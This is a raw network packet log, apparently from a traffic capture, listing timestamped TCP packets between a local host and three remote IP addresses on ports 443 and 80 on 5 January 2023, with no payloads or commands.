                                                                                                                                                                                    Jan 5, 2023 08:58:12.834227085 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.834239960 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.834259987 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.834357977 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.834381104 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.834424019 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.834427118 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.834439039 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.834445953 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.834502935 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.834716082 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.834734917 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.834804058 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.834817886 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.834837914 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.834958076 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.834983110 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835009098 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835063934 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835068941 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835081100 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835098982 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835141897 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835169077 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835315943 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835334063 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835400105 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835417032 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835437059 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835591078 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835613966 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835665941 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835670948 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835686922 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835709095 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835742950 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835771084 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835930109 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.835947990 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.836009026 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.836020947 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.836041927 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.836074114 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.836169958 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.836188078 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.836227894 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.836373091 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.836373091 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.836389065 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.836412907 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.836429119 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.836447001 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.836452961 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.836503983 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.836555004 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.878499985 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.878551960 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.878595114 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.878618002 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.878648996 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.878679037 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.878695965 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.878786087 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.878832102 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.879251957 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.879841089 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.879868984 CET4434973680.67.82.211192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:12.879936934 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:12.879988909 CET49736443192.168.2.480.67.82.211
                                                                                                                                                                                    Jan 5, 2023 08:58:20.737535954 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:20.754973888 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:20.755088091 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:20.755234003 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:20.755234957 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:20.772715092 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:20.772784948 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:20.907351017 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:20.907380104 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:20.907454967 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:20.917726040 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:20.917788029 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:20.935087919 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:20.935138941 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.007390022 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.007452011 CET8049737188.114.97.3192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.007508993 CET4973780192.168.2.4188.114.97.3
                                                                                                                                                                                    Jan 5, 2023 08:58:21.026530027 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.085860014 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.085975885 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.086086988 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.145363092 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.145437002 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.145487070 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.145529032 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.145574093 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.145606995 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.145642042 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.145657063 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.145709038 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.145760059 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.145770073 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.145826101 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.145874977 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.145885944 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.145941973 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.145999908 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205229998 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205332994 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205380917 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205429077 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205441952 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205502987 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205509901 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205570936 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205621004 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205630064 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205688000 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205739021 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205745935 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205802917 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205849886 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205857992 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205914021 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205960989 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.205971956 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.206024885 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.206073999 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.206079960 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.206136942 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.206187010 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.206192017 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.206249952 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.206299067 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.206305981 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.206362963 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.206415892 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.265644073 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.265731096 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.265793085 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.265836000 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.265855074 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.265914917 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.265966892 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.265974045 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266037941 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266040087 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266103983 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266158104 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266166925 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266225100 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266278028 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266283035 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266350031 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266401052 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266421080 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266469955 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266527891 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266547918 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266594887 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266648054 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266657114 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266752958 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266819000 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266832113 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266889095 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266937971 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.266948938 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267000914 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267052889 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267055988 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267115116 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267163992 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267173052 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267229080 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267278910 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267287016 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267350912 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267400026 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267405033 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267462969 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267509937 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267522097 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267577887 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267631054 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267638922 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267694950 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267745018 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267760992 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267813921 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267862082 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267872095 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267925978 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267972946 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.267983913 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.268038988 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.268100023 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.327545881 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.327625036 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.327677965 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.327727079 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.327778101 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.327778101 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.327789068 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.327862024 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.327917099 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.327929020 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.327981949 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328032017 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328043938 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328097105 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328145981 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328157902 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328210115 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328262091 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328264952 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328322887 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328372955 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328377008 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328434944 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328485966 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328490019 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328547955 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328598022 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328608036 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328665018 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328716040 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328722000 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328778982 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328828096 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328836918 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328891039 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328941107 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.328946114 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329003096 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329051971 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329060078 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329117060 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329181910 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329184055 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329248905 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329301119 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329302073 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329361916 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329412937 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329415083 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329473972 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329521894 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329530954 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329586029 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329642057 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329643011 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329703093 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329751015 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329761028 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329814911 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329864979 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329870939 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329926968 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329973936 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.329986095 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.330038071 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.330086946 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.330091000 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.330149889 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.330199003 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.330204964 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.330260992 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.330312014 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.330318928 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.330374956 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.330426931 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.389666080 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.389724970 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.389745951 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.389771938 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.389792919 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.389811039 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.389842033 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.389869928 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.389898062 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.389923096 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.389923096 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.389949083 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.389971972 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.389978886 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.389992952 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390010118 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390018940 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390038967 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390065908 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390077114 CET4973880192.168.2.462.204.41.145
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390094995 CET804973862.204.41.145192.168.2.4
                                                                                                                                                                                    Jan 5, 2023 08:58:21.390124083 CET804973862.204.41.145192.168.2.4
